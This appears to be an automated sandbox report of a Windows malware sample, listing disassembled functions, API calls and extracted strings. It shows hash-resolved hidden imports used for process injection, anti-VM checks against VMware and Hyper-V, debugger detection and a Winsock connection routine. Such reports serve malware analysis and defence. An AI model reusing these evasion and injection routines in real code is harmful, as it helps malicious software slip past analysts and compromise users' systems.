004144BB mov edx, dword ptr [ebp+24h]
004144BE push edx
004144BF mov eax, dword ptr [ebp+20h]
004144C2 push eax
004144C3 mov ecx, dword ptr [ebp+1Ch]
004144C6 push ecx
004144C7 mov edx, dword ptr [ebp+18h]
004144CA push edx
004144CB mov eax, dword ptr [ebp+14h]
004144CE push eax
004144CF mov ecx, dword ptr [ebp+10h]
004144D2 push ecx
004144D3 mov edx, dword ptr [ebp+0Ch]
004144D6 push edx
004144D7 mov eax, dword ptr [ebp+08h]
004144DA push eax
004144DB push 6B5366BEh
004144E0 push 46318AC7h
004144E5 call 00415E40h
004144EA call eax CreateProcessA@KERNEL32.DLL (Hidden Import)
004144EC pop ebp
004144ED retn 0028h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteFile.KERNEL32, ref: 00414016
Address Instruction Meta Information
00413FF0 push ebp xrefs 00414763, 00413CAA, 00413CCB, 00413CEE, 00413D0C, 00413A97
00413FF1 mov ebp, esp
00413FF3 mov eax, dword ptr [ebp+18h]
00413FF6 push eax
00413FF7 mov ecx, dword ptr [ebp+14h]
00413FFA push ecx
00413FFB mov edx, dword ptr [ebp+10h]
00413FFE push edx
00413FFF mov eax, dword ptr [ebp+0Ch]
00414002 push eax
00414003 mov ecx, dword ptr [ebp+08h]
00414006 push ecx
00414007 push 6B5366BEh
0041400C push 0F3FD1C3h
00414011 call 00415E40h
00414016 call eax WriteFile@KERNEL32.DLL (Import)
00414018 pop ebp
00414019 retn 0014h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • Sleep.KERNEL32, ref: 00414196
Address Instruction Meta Information
00414180 push ebp xrefs 004153DD, 00413E24
00414181 mov ebp, esp
00414183 mov eax, dword ptr [ebp+08h]
00414186 push eax
00414187 push 6B5366BEh
0041418C push 3D9972F5h
00414191 call 00415E40h
00414196 call eax Sleep@KERNEL32.DLL (Hidden Import)
00414198 pop ebp
00414199 retn 0004h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateFileA.KERNEL32, ref: 00413FBE
Address Instruction Meta Information
00413F90 push ebp xrefs 0041473E, 00414D07, 004139CC, 00413A2D, 00413A57
00413F91 mov ebp, esp
00413F93 mov eax, dword ptr [ebp+20h]
00413F96 push eax
00413F97 mov ecx, dword ptr [ebp+1Ch]
00413F9A push ecx
00413F9B mov edx, dword ptr [ebp+18h]
00413F9E push edx
00413F9F mov eax, dword ptr [ebp+14h]
00413FA2 push eax
00413FA3 mov ecx, dword ptr [ebp+10h]
00413FA6 push ecx
00413FA7 mov edx, dword ptr [ebp+0Ch]
00413FAA push edx
00413FAB mov eax, dword ptr [ebp+08h]
00413FAE push eax
00413FAF push 6B5366BEh
00413FB4 push 08F8F114h
00413FB9 call 00415E40h
00413FBE call eax CreateFileA@KERNEL32.DLL (Import)
00413FC0 pop ebp
00413FC1 retn 001Ch function end
APIs
  • ExitProcess.KERNEL32, ref: 0041632D
Address Instruction Meta Information
004162FF call 0041635Bh xrefs 004161EA
00416304 push 00000000h
00416306 push 00401090h
0041630B push 0040108Ch
00416310 call 00416334h
00416315 push 00000000h
00416317 push 00401098h
0041631C push 00401094h
00416321 call 00416334h
00416326 add esp, 18h
00416329 push dword ptr [esp+04h]
0041632D call dword ptr [0040101Ch] ExitProcess@KERNEL32.DLL (Import)
00416333 int3
APIs
  • WSAStartup.WS2_32, ref: 00414BB5
  • WSASocketA.WS2_32, ref: 00414BC7
  • WSACleanup.WS2_32, ref: 00414BDC
  • gethostbyname.WS2_32, ref: 00414BEE
  • WSACleanup.WS2_32, ref: 00414C03
  • htons.WS2_32, ref: 00414C10
  • inet_ntoa.WS2_32, ref: 00414C37
  • inet_addr.WS2_32, ref: 00414C3E
  • WSAConnect.WS2_32, ref: 00414C62
  • WSACleanup.WS2_32, ref: 00414C6D
Address Instruction Meta Information
00414BA0 push ebp xrefs 00414DF0
00414BA1 mov ebp, esp
00414BA3 sub esp, 000001A8h
00414BA9 lea eax, dword ptr [ebp-00000190h]
00414BAF push eax
00414BB0 push 00000202h
00414BB5 call dword ptr [00401048h] WSAStartup@WS2_32.DLL (Import)
00414BBF push 00000000h Count = 3
00414BC1 push 00000006h
00414BC3 push 00000001h
00414BC5 push 00000002h
00414BC7 call dword ptr [00401068h] WSASocketA@WS2_32.DLL (Import)
00414BCD mov dword ptr [ebp-00000194h], eax
00414BD3 cmp dword ptr [ebp-00000194h], FFFFFFFFh
00414BDA jne 00414BEAh
00414BDC call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414BE2 or eax, FFFFFFFFh
00414BE5 jmp 00414C7Eh
00414BEA mov ecx, dword ptr [ebp+08h] xrefs 00414BDA
00414BED push ecx
00414BEE call dword ptr [00401060h] gethostbyname@WS2_32.DLL (Import)
00414BF4 mov dword ptr [ebp-00000198h], eax
00414BFA cmp dword ptr [ebp-00000198h], 00000000h
00414C01 jne 00414C0Eh
00414C03 call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C09 or eax, FFFFFFFFh
00414C0C jmp 00414C7Eh
00414C0E push 00000050h xrefs 00414C01
00414C10 call dword ptr [00401054h] htons@WS2_32.DLL (Import)
00414C16 mov word ptr [ebp-000001A6h], ax
00414C1D mov edx, 00000002h
00414C22 mov word ptr [ebp-000001A8h], dx
00414C29 mov eax, dword ptr [ebp-00000198h]
00414C2F mov ecx, dword ptr [eax+0Ch]
00414C32 mov edx, dword ptr [ecx]
00414C34 mov eax, dword ptr [edx]
00414C36 push eax
00414C37 call dword ptr [00401044h] inet_ntoa@WS2_32.DLL (Import)
00414C3D push eax
00414C3E call dword ptr [0040104Ch] inet_addr@WS2_32.DLL (Import)
00414C44 mov dword ptr [ebp-000001A4h], eax
00414C50 push 00000000h Count = 4
00414C52 push 00000010h
00414C54 lea ecx, dword ptr [ebp-000001A8h]
00414C5A push ecx
00414C5B mov edx, dword ptr [ebp-00000194h]
00414C61 push edx
00414C62 call dword ptr [00401050h] WSAConnect@WS2_32.DLL (Import)
00414C68 cmp eax, FFFFFFFFh
00414C6B jne 00414C78h
00414C6D call dword ptr [00401058h] WSACleanup@WS2_32.DLL (Import)
00414C73 or eax, FFFFFFFFh
00414C76 jmp 00414C7Eh
00414C78 mov eax, dword ptr [ebp-00000194h] xrefs 00414C6B
00414C7E mov esp, ebp xrefs 00414C76, 00414C0C, 00414BE5
00414C80 pop ebp
00414C81 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetThreadContext.KERNEL32, ref: 0041456A
Address Instruction Meta Information
00414550 push ebp xrefs 00414407
00414551 mov ebp, esp
00414553 mov eax, dword ptr [ebp+0Ch]
00414556 push eax
00414557 mov ecx, dword ptr [ebp+08h]
0041455A push ecx
0041455B push 6B5366BEh
00414560 push AA1DC82Fh
00414565 call 00415E40h
0041456A call eax SetThreadContext@KERNEL32.DLL (Hidden Import)
0041456C pop ebp
0041456D retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • SetCurrentDirectoryA.KERNEL32, ref: 00414126
Address Instruction Meta Information
00414110 push ebp xrefs 00413F16, 00413DA6, 00413DBA
00414111 mov ebp, esp
00414113 mov eax, dword ptr [ebp+08h]
00414116 push eax
00414117 push 6B5366BEh
0041411C push C807174Eh
00414121 call 00415E40h
00414126 call eax SetCurrentDirectoryA@KERNEL32.DLL (Hidden Import)
00414128 pop ebp
00414129 retn 0004h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • MoveFileExA.KERNEL32, ref: 00414A1E
Address Instruction Meta Information
00414A00 push ebp xrefs 0041461B
00414A01 mov ebp, esp
00414A03 mov eax, dword ptr [ebp+10h]
00414A06 push eax
00414A07 mov ecx, dword ptr [ebp+0Ch]
00414A0A push ecx
00414A0B mov edx, dword ptr [ebp+08h]
00414A0E push edx
00414A0F push 6B5366BEh
00414A14 push 3A7A7478h
00414A19 call 00415E40h
00414A1E call eax MoveFileExA@KERNEL32.DLL (Hidden Import)
00414A20 pop ebp
00414A21 retn 000Ch function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CheckRemoteDebuggerPresent.KERNEL32, ref: 0041226A
Address Instruction Meta Information
00412250 push ebp xrefs 004121A3
00412251 mov ebp, esp
00412253 mov eax, dword ptr [ebp+0Ch]
00412256 push eax
00412257 mov ecx, dword ptr [ebp+08h]
0041225A push ecx
0041225B push 6B5366BEh
00412260 push 6D3A8272h
00412265 call 00415E40h
0041226A call eax CheckRemoteDebuggerPresent@KERNEL32.DLL (Hidden Import)
0041226C pop ebp
0041226D retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • VirtualAllocEx.KERNEL32, ref: 00414516
Address Instruction Meta Information
004144F0 push ebp xrefs 00414329, 004151A5
004144F1 mov ebp, esp
004144F3 mov eax, dword ptr [ebp+18h]
004144F6 push eax
004144F7 mov ecx, dword ptr [ebp+14h]
004144FA push ecx
004144FB mov edx, dword ptr [ebp+10h]
004144FE push edx
004144FF mov eax, dword ptr [ebp+0Ch]
00414502 push eax
00414503 mov ecx, dword ptr [ebp+08h]
00414506 push ecx
00414507 push 6B5366BEh
0041450C push 9ABFB8A6h
00414511 call 00415E40h
00414516 call eax VirtualAllocEx@KERNEL32.DLL (Hidden Import)
00414518 pop ebp
00414519 retn 0014h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • ResumeThread.KERNEL32, ref: 00414586
Address Instruction Meta Information
00414570 push ebp xrefs 00414410
00414571 mov ebp, esp
00414573 mov eax, dword ptr [ebp+08h]
00414576 push eax
00414577 push 6B5366BEh
0041457C push 7B88BF3Bh
00414581 call 00415E40h
00414586 call eax ResumeThread@KERNEL32.DLL (Hidden Import)
00414588 pop ebp
00414589 retn 0004h function end
APIs
  • InternetGetConnectedState.WININET, ref: 00414B8A
Address Instruction Meta Information
00414B80 push ebp xrefs 0041493D
00414B81 mov ebp, esp
00414B83 push ecx
00414B84 push 00000000h
00414B86 lea eax, dword ptr [ebp-04h]
00414B89 push eax
00414B8A call dword ptr [0040103Ch] InternetGetConnectedState@WININET.DLL (Import)
00414B90 neg eax
00414B92 sbb eax, eax
00414B94 neg eax
00414B96 mov esp, ebp
00414B98 pop ebp
00414B99 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateToolhelp32Snapshot.KERNEL32, ref: 004136BA
Address Instruction Meta Information
004136A0 push ebp xrefs 004133A7
004136A1 mov ebp, esp
004136A3 mov eax, dword ptr [ebp+0Ch]
004136A6 push eax
004136A7 mov ecx, dword ptr [ebp+08h]
004136AA push ecx
004136AB push 6B5366BEh
004136B0 push 5BC1D14Fh
004136B5 call 00415E40h
004136BA call eax CreateToolhelp32Snapshot@KERNEL32.DLL (Hidden Import)
004136BC pop ebp
004136BD retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegQueryValueExA.ADVAPI32, ref: 004137DA
Address Instruction Meta Information
004137B0 push ebp xrefs 004135C1
004137B1 mov ebp, esp
004137B3 mov eax, dword ptr [ebp+1Ch]
004137B6 push eax
004137B7 mov ecx, dword ptr [ebp+18h]
004137BA push ecx
004137BB mov edx, dword ptr [ebp+14h]
004137BE push edx
004137BF mov eax, dword ptr [ebp+10h]
004137C2 push eax
004137C3 mov ecx, dword ptr [ebp+0Ch]
004137C6 push ecx
004137C7 mov edx, dword ptr [ebp+08h]
004137CA push edx
004137CB push 647832FCh
004137D0 push 1802E7C8h
004137D5 call 00415E40h
004137DA call eax RegQueryValueExA@ADVAPI32.DLL (Hidden Import)
004137DC pop ebp
004137DD retn 0018h function end
Non-executed Functions
Strings
  • vmwareuser.exe, va: 00411E44
  • vmwaretray.exe, va: 00411E54
  • SYSTEM\ControlSet001\Services, va: 00411E64
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, va: 00411E88
  • vmdebug, va: 00411ED8
  • vmmouse, va: 00411EE0
  • VMTools, va: 00411EE8
  • VMMEMCTL, va: 00411EF0
  • vmware, va: 00411EFC
  • Identifier, va: 00411F04
Address Instruction Meta Information
00412540 push ebp xrefs 004147FA
00412541 mov ebp, esp
00412543 sub esp, 0000029Ch
00412549 push esi
0041254A push edi
0041254B mov eax, dword ptr [00411E44h] ASCII "vmwareuser.exe"
00412550 mov dword ptr [ebp-00000294h], eax
00412556 mov ecx, dword ptr [00411E48h] 73756572
0041255C mov dword ptr [ebp-00000290h], ecx
00412562 mov edx, dword ptr [00411E4Ch] 652E7265
00412568 mov dword ptr [ebp-0000028Ch], edx
0041256E mov ax, word ptr [00411E50h] 6578
00412574 mov word ptr [ebp-00000288h], ax
0041257B mov cl, byte ptr [00411E52h] 00
00412581 mov byte ptr [ebp-00000286h], cl
00412587 xor edx, edx
00412589 mov dword ptr [ebp-00000285h], edx
0041258F mov byte ptr [ebp-00000281h], dl
00412595 mov eax, dword ptr [00411E54h] ASCII "vmwaretray.exe"
0041259A mov dword ptr [ebp-00000280h], eax
004125A0 mov ecx, dword ptr [00411E58h] 72746572
004125A6 mov dword ptr [ebp-0000027Ch], ecx
004125AC mov edx, dword ptr [00411E5Ch] 652E7961
004125B2 mov dword ptr [ebp-00000278h], edx
004125B8 mov ax, word ptr [00411E60h] 6578
004125BE mov word ptr [ebp-00000274h], ax
004125C5 mov cl, byte ptr [00411E62h] 00
004125CB mov byte ptr [ebp-00000272h], cl
004125D1 xor edx, edx
004125D3 mov dword ptr [ebp-00000271h], edx
004125D9 mov byte ptr [ebp-0000026Dh], dl
004125DF xor eax, eax
004125E1 mov word ptr [ebp-04h], ax
004125E5 jmp 004125F3h
004125E7 mov cx, word ptr [ebp-04h] xrefs 00412621
004125EB add cx, 0001h
004125EF mov word ptr [ebp-04h], cx
004125F3 movzx edx, word ptr [ebp-04h] xrefs 004125E5
004125F7 cmp edx, 02h
004125FA jnl 00412623h
004125FC movzx eax, word ptr [ebp-04h]
00412600 imul eax, eax, 14h
00412603 lea ecx, dword ptr [ebp+eax-00000294h]
0041260A push ecx
0041260B call 00413380h
00412610 add esp, 04h
00412613 movzx edx, al
00412616 test edx, edx
00412618 je 00412621h
0041261A mov al, 01h
0041261C jmp 004127D4h
00412621 jmp 004125E7h xrefs 00412618
00412623 mov ecx, 00000007h xrefs 004125FA
00412628 mov esi, 00411E64h ASCII "SYSTEM\ControlSet001\Services"
0041262D lea edi, dword ptr [ebp-00000260h]
00412633 rep movsd
00412635 movsw
00412637 push 00000046h
00412639 push 00000000h
0041263B lea eax, dword ptr [ebp-00000242h]
00412641 push eax
00412642 call 00415F8Fh
00412647 add esp, 0Ch
0041264A mov ecx, 00000013h
0041264F mov esi, 00411E88h ASCII "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
00412654 lea edi, dword ptr [ebp-000001FCh]
0041265A rep movsd
0041265C movsb
0041265D xor ecx, ecx
0041265F mov dword ptr [ebp-000001AFh], ecx
00412665 mov dword ptr [ebp-000001ABh], ecx
0041266B mov dword ptr [ebp-000001A7h], ecx
00412671 mov dword ptr [ebp-000001A3h], ecx
00412677 mov dword ptr [ebp-0000019Fh], ecx
0041267D mov word ptr [ebp-0000019Bh], cx
00412684 mov byte ptr [ebp-00000199h], cl
0041268A mov edx, dword ptr [00411ED8h] ASCII "vmdebug"
00412690 mov dword ptr [ebp-00000198h], edx
00412696 mov eax, dword ptr [00411EDCh] 00677562
0041269B mov dword ptr [ebp-00000194h], eax
004126A1 push 0000005Ch
004126A3 push 00000000h
004126A5 lea ecx, dword ptr [ebp-00000190h]
004126AB push ecx
004126AC call 00415F8Fh
004126B1 add esp, 0Ch
004126B4 mov edx, dword ptr [00411EE0h] ASCII "vmmouse"
004126BA mov dword ptr [ebp-00000134h], edx
004126C0 mov eax, dword ptr [00411EE4h] 00657375
004126C5 mov dword ptr [ebp-00000130h], eax
004126CB push 0000005Ch
004126CD push 00000000h
004126CF lea ecx, dword ptr [ebp-0000012Ch]
004126D5 push ecx
004126D6 call 00415F8Fh
004126DB add esp, 0Ch
004126DE mov edx, dword ptr [00411EE8h] ASCII "VMTools"
004126E4 mov dword ptr [ebp-000000D0h], edx
004126EA mov eax, dword ptr [00411EECh] 00736C6F
004126EF mov dword ptr [ebp-000000CCh], eax
004126F5 push 0000005Ch
004126F7 push 00000000h
004126F9 lea ecx, dword ptr [ebp-000000C8h]
004126FF push ecx
00412700 call 00415F8Fh
00412705 add esp, 0Ch
00412708 mov edx, dword ptr [00411EF0h] ASCII "VMMEMCTL"
0041270E mov dword ptr [ebp-6Ch], edx
00412711 mov eax, dword ptr [00411EF4h] 4C54434D
00412716 mov dword ptr [ebp-68h], eax
00412719 mov cl, byte ptr [00411EF8h] 00
0041271F mov byte ptr [ebp-64h], cl
00412722 push 0000005Bh
00412724 push 00000000h
00412726 lea edx, dword ptr [ebp-63h]
00412729 push edx
0041272A call 00415F8Fh
0041272F add esp, 0Ch
00412732 push 00000004h
00412734 lea eax, dword ptr [ebp-00000198h]
0041273A push eax
0041273B lea ecx, dword ptr [ebp-00000260h]
00412741 push ecx
00412742 call 00413450h
00412747 add esp, 0Ch
0041274A movzx edx, al
0041274D test edx, edx
0041274F je 00412755h
00412751 mov al, 01h
00412753 jmp 004127D4h
00412755 mov eax, dword ptr [00411EFCh] ASCII "vmware" xrefs 0041274F
0041275A mov dword ptr [ebp-0000029Ch], eax
00412760 mov cx, word ptr [00411F00h] 6572
00412767 mov word ptr [ebp-00000298h], cx
0041276E mov dl, byte ptr [00411F02h] 00
00412774 mov byte ptr [ebp-00000296h], dl
0041277A mov eax, dword ptr [00411F04h] ASCII "Identifier"
0041277F mov dword ptr [ebp-0000026Ch], eax
00412785 mov ecx, dword ptr [00411F08h] 69666974
0041278B mov dword ptr [ebp-00000268h], ecx
00412791 mov dx, word ptr [00411F0Ch] 7265
00412798 mov word ptr [ebp-00000264h], dx
0041279F mov al, byte ptr [00411F0Eh] 00
004127A4 mov byte ptr [ebp-00000262h], al
004127AA lea ecx, dword ptr [ebp-0000029Ch]
004127B0 push ecx
004127B1 lea edx, dword ptr [ebp-0000026Ch]
004127B7 push edx
004127B8 lea eax, dword ptr [ebp-000001FCh]
004127BE push eax
004127BF call 00413560h
004127C4 add esp, 0Ch
004127C7 movzx ecx, al
004127CA test ecx, ecx
004127CC je 004127D2h
004127CE mov al, 01h
004127D0 jmp 004127D4h
004127D2 xor al, al xrefs 004127CC
004127D4 pop edi xrefs 004127D0, 00412753, 0041261C
004127D5 pop esi
004127D6 mov esp, ebp
004127D8 pop ebp
004127D9 ret function end
Strings
  • SOFTWARE\Microsoft, va: 00411DC0
  • SYSTEM\ControlSet001\Services, va: 00411DD4
  • Hyper-V, va: 00411DF4
  • VirtualMachine, va: 00411DFC
  • vmicheartbeat, va: 00411E0C
  • vmicvss, va: 00411E1C
  • vmicshutdown, va: 00411E24
  • vmicexchange, va: 00411E34
Address Instruction Meta Information
004122B0 push ebp xrefs 004147EE
004122B1 mov ebp, esp
004122B3 sub esp, 000003F0h
004122B9 push esi
004122BA push edi
004122BB mov eax, dword ptr [00411DC0h] ASCII "SOFTWARE\Microsoft"
004122C0 mov dword ptr [ebp-000003F0h], eax
004122C6 mov ecx, dword ptr [00411DC4h] 45524157
004122CC mov dword ptr [ebp-000003ECh], ecx
004122D2 mov edx, dword ptr [00411DC8h] 63694D5C
004122D8 mov dword ptr [ebp-000003E8h], edx
004122DE mov eax, dword ptr [00411DCCh] 6F736F72
004122E3 mov dword ptr [ebp-000003E4h], eax
004122E9 mov cx, word ptr [00411DD0h] 7466
004122F0 mov word ptr [ebp-000003E0h], cx
004122F7 mov dl, byte ptr [00411DD2h] 00
004122FD mov byte ptr [ebp-000003DEh], dl
00412303 push 00000051h
00412305 push 00000000h
00412307 lea eax, dword ptr [ebp-000003DDh]
0041230D push eax
0041230E call 00415F8Fh
00412313 add esp, 0Ch
00412316 mov ecx, 00000007h
0041231B mov esi, 00411DD4h ASCII "SYSTEM\ControlSet001\Services"
00412320 lea edi, dword ptr [ebp-0000038Ch]
00412326 rep movsd
00412328 movsw
0041232A push 00000046h
0041232C push 00000000h
0041232E lea ecx, dword ptr [ebp-0000036Eh]
00412334 push ecx
00412335 call 00415F8Fh
0041233A add esp, 0Ch
0041233D mov edx, dword ptr [00411DF4h] ASCII "Hyper-V"
00412343 mov dword ptr [ebp-00000328h], edx
00412349 mov eax, dword ptr [00411DF8h] 00562D72
0041234E mov dword ptr [ebp-00000324h], eax
00412354 push 0000005Ch
00412356 push 00000000h
00412358 lea ecx, dword ptr [ebp-00000320h]
0041235E push ecx
0041235F call 00415F8Fh
00412364 add esp, 0Ch
00412367 mov edx, dword ptr [00411DFCh] ASCII "VirtualMachine"
0041236D mov dword ptr [ebp-000002C4h], edx
00412373 mov eax, dword ptr [00411E00h] 4D6C6175
00412378 mov dword ptr [ebp-000002C0h], eax
0041237E mov ecx, dword ptr [00411E04h] 69686361
00412384 mov dword ptr [ebp-000002BCh], ecx
0041238A mov dx, word ptr [00411E08h] 656E
00412391 mov word ptr [ebp-000002B8h], dx
00412398 mov al, byte ptr [00411E0Ah] 00
0041239D mov byte ptr [ebp-000002B6h], al
004123A3 push 00000055h
004123A5 push 00000000h
004123A7 lea ecx, dword ptr [ebp-000002B5h]
004123AD push ecx
004123AE call 00415F8Fh
004123B3 add esp, 0Ch
004123B6 mov dl, byte ptr [0041198Bh] 00
004123BC mov byte ptr [ebp-00000260h], dl
004123C2 push 00000063h
004123C4 push 00000000h
004123C6 lea eax, dword ptr [ebp-0000025Fh]
004123CC push eax
004123CD call 00415F8Fh
004123D2 add esp, 0Ch
004123D5 mov cl, byte ptr [0041198Fh] 00
004123DB mov byte ptr [ebp-000001FCh], cl
004123E1 push 00000063h
004123E3 push 00000000h
004123E5 lea edx, dword ptr [ebp-000001FBh]
004123EB push edx
004123EC call 00415F8Fh
004123F1 add esp, 0Ch
004123F4 mov eax, dword ptr [00411E0Ch] ASCII "vmicheartbeat"
004123F9 mov dword ptr [ebp-00000198h], eax
004123FF mov ecx, dword ptr [00411E10h] 72616568
00412405 mov dword ptr [ebp-00000194h], ecx
0041240B mov edx, dword ptr [00411E14h] 61656274
00412411 mov dword ptr [ebp-00000190h], edx
00412417 mov ax, word ptr [00411E18h] 0074
0041241D mov word ptr [ebp-0000018Ch], ax
00412424 push 00000056h
00412426 push 00000000h
00412428 lea ecx, dword ptr [ebp-0000018Ah]
0041242E push ecx
0041242F call 00415F8Fh
00412434 add esp, 0Ch
00412437 mov edx, dword ptr [00411E1Ch] ASCII "vmicvss"
0041243D mov dword ptr [ebp-00000134h], edx
00412443 mov eax, dword ptr [00411E20h] 00737376
00412448 mov dword ptr [ebp-00000130h], eax
0041244E push 0000005Ch
00412450 push 00000000h
00412452 lea ecx, dword ptr [ebp-0000012Ch]
00412458 push ecx
00412459 call 00415F8Fh
0041245E add esp, 0Ch
00412461 mov edx, dword ptr [00411E24h] ASCII "vmicshutdown"
00412467 mov dword ptr [ebp-000000D0h], edx
0041246D mov eax, dword ptr [00411E28h] 74756873
00412472 mov dword ptr [ebp-000000CCh], eax
00412478 mov ecx, dword ptr [00411E2Ch] 6E776F64
0041247E mov dword ptr [ebp-000000C8h], ecx
00412484 mov dl, byte ptr [00411E30h] 00
0041248A mov byte ptr [ebp-000000C4h], dl
00412490 push 00000057h
00412492 push 00000000h
00412494 lea eax, dword ptr [ebp-000000C3h]
0041249A push eax
0041249B call 00415F8Fh
004124A0 add esp, 0Ch
004124A3 mov ecx, dword ptr [00411E34h] ASCII "vmicexchange"
004124A9 mov dword ptr [ebp-6Ch], ecx
004124AC mov edx, dword ptr [00411E38h] 68637865
004124B2 mov dword ptr [ebp-68h], edx
004124B5 mov eax, dword ptr [00411E3Ch] 65676E61
004124BA mov dword ptr [ebp-64h], eax
004124BD mov cl, byte ptr [00411E40h] 00
004124C3 mov byte ptr [ebp-60h], cl
004124C6 push 00000057h
004124C8 push 00000000h
004124CA lea edx, dword ptr [ebp-5Fh]
004124CD push edx
004124CE call 00415F8Fh
004124D3 add esp, 0Ch
004124D6 xor eax, eax
004124D8 mov word ptr [ebp-04h], ax
004124DC jmp 004124EAh
004124DE mov cx, word ptr [ebp-04h] xrefs 00412529
004124E2 add cx, 0001h
004124E6 mov word ptr [ebp-04h], cx
004124EA movzx edx, word ptr [ebp-04h] xrefs 004124DC
004124EE cmp edx, 02h
004124F1 jnl 0041252Bh
004124F3 push 00000004h
004124F5 movzx eax, word ptr [ebp-04h]
004124F9 imul eax, eax, 00000190h
004124FF lea ecx, dword ptr [ebp+eax-00000328h]
00412506 push ecx
00412507 movzx edx, word ptr [ebp-04h]
0041250B imul edx, edx, 64h
0041250E lea eax, dword ptr [ebp+edx-000003F0h]
00412515 push eax
00412516 call 00413450h
0041251B add esp, 0Ch
0041251E movzx ecx, al
00412521 test ecx, ecx
00412523 je 00412529h
00412525 mov al, 01h
00412527 jmp 0041252Dh
00412529 jmp 004124DEh xrefs 00412523
0041252B xor al, al xrefs 004124F1
0041252D pop edi xrefs 00412527
0041252E pop esi
0041252F mov esp, ebp
00412531 pop ebp
00412532 ret function end
Address Instruction Meta Information
00413380 push ebp xrefs 0041260B, 0041288D, 00412F0F, 00412F7E
00413381 mov ebp, esp
00413383 sub esp, 00000198h
00413389 mov dword ptr [ebp-00000178h], 00000128h
00413393 mov eax, dword ptr [ebp+08h]
00413396 push eax
00413397 call 00415EDCh
0041339C add esp, 04h
0041339F mov word ptr [ebp-08h], ax
004133A3 push 00000000h
004133A5 push 00000002h
004133A7 call 004136A0h
004133AC mov dword ptr [ebp-04h], eax
004133AF mov cl, byte ptr [00411987h] 00
004133B5 mov byte ptr [ebp-70h], cl
004133B8 push 00000063h
004133BA push 00000000h
004133BC lea edx, dword ptr [ebp-6Fh]
004133BF push edx
004133C0 call 00415F8Fh
004133C5 add esp, 0Ch
004133C8 mov eax, dword ptr [ebp+08h]
004133CB push eax
004133CC call 00413330h
004133D1 add esp, 04h
004133D4 lea ecx, dword ptr [ebp-00000198h]
004133DA push ecx
004133DB mov edx, dword ptr [ebp-04h]
004133DE push edx
004133DF call 004136C0h
004133E4 test eax, eax
004133E6 je 0041343Eh
004133E8 lea eax, dword ptr [ebp-00000198h] xrefs 0041343C
004133EE push eax
004133EF mov ecx, dword ptr [ebp-04h]
004133F2 push ecx
004133F3 call 004136E0h
004133F8 test eax, eax
004133FA je 0041343Eh
004133FC lea edx, dword ptr [ebp-00000174h]
00413402 push edx
00413403 lea eax, dword ptr [ebp-70h]
00413406 push eax
00413407 call 00415EECh
0041340C add esp, 08h
0041340F mov byte ptr [ebp-0Dh], 00000000h
00413413 lea ecx, dword ptr [ebp-70h]
00413416 push ecx
00413417 call 00413330h
0041341C add esp, 04h
0041341F movzx edx, word ptr [ebp-08h]
00413423 push edx
00413424 lea eax, dword ptr [ebp-70h]
00413427 push eax
00413428 mov ecx, dword ptr [ebp+08h]
0041342B push ecx
0041342C call 00415EABh
00413431 add esp, 0Ch
00413434 test eax, eax
00413436 jne 0041343Ch
00413438 mov al, 01h
0041343A jmp 00413449h
0041343C jmp 004133E8h xrefs 00413436
0041343E mov edx, dword ptr [ebp-04h] xrefs 004133E6, 004133FA
00413441 push edx
00413442 call 00413700h
00413447 xor al, al
00413449 mov esp, ebp xrefs 0041343A
0041344B pop ebp
0041344C ret function end
Address Instruction Meta Information
00413560 push ebp xrefs 004127BF, 00412ECE
00413561 mov ebp, esp
00413563 sub esp, 00000408h
00413569 mov dword ptr [ebp-00000204h], 000001F4h
00413573 mov dword ptr [ebp-00000404h], 00000001h
0041357D mov dword ptr [ebp-08h], 00000000h
00413584 lea eax, dword ptr [ebp-04h]
00413587 push eax
00413588 push 00000001h
0041358A push 00000000h
0041358C mov ecx, dword ptr [ebp+08h]
0041358F push ecx
00413590 push 80000002h
00413595 call 00413720h
0041359A test eax, eax
0041359C jne 0041368Dh
004135A2 lea edx, dword ptr [ebp-00000204h]
004135A8 push edx
004135A9 lea eax, dword ptr [ebp-00000200h]
004135AF push eax
004135B0 lea ecx, dword ptr [ebp-00000404h]
004135B6 push ecx
004135B7 push 00000000h
004135B9 mov edx, dword ptr [ebp+0Ch]
004135BC push edx
004135BD mov eax, dword ptr [ebp-04h]
004135C0 push eax
004135C1 call 004137B0h
004135C6 mov dword ptr [ebp-00000408h], eax
004135CC cmp dword ptr [ebp-00000408h], 00000000h
004135D3 jne 00413680h
004135D9 mov ecx, dword ptr [ebp-04h]
004135DC push ecx
004135DD call 00413790h
004135E2 lea edx, dword ptr [ebp-00000200h]
004135E8 push edx
004135E9 lea eax, dword ptr [ebp-00000400h]
004135EF push eax
004135F0 call 00415EECh
004135F5 add esp, 08h
004135F8 mov ecx, dword ptr [ebp+10h]
004135FB push ecx
004135FC call 00413330h
00413601 add esp, 04h
00413604 lea edx, dword ptr [ebp-00000400h]
0041360A push edx
0041360B call 00413330h
00413610 add esp, 04h
00413613 mov eax, dword ptr [ebp+10h]
00413616 push eax
00413617 call 00415EDCh
0041361C add esp, 04h
0041361F mov dword ptr [ebp-00000204h], eax
00413625 lea ecx, dword ptr [ebp-00000400h]
0041362B push ecx
0041362C call 00415EDCh
00413631 add esp, 04h
00413634 mov dword ptr [ebp-08h], eax
00413637 mov edx, dword ptr [ebp-08h] xrefs 0041367E
0041363A cmp edx, dword ptr [ebp-00000204h]
00413640 jc 00413680h
00413642 mov eax, dword ptr [ebp-00000204h]
00413648 push eax
00413649 lea ecx, dword ptr [ebp-00000400h]
0041364F push ecx
00413650 mov edx, dword ptr [ebp+10h]
00413653 push edx
00413654 call 00415EABh
00413659 add esp, 0Ch
0041365C test eax, eax
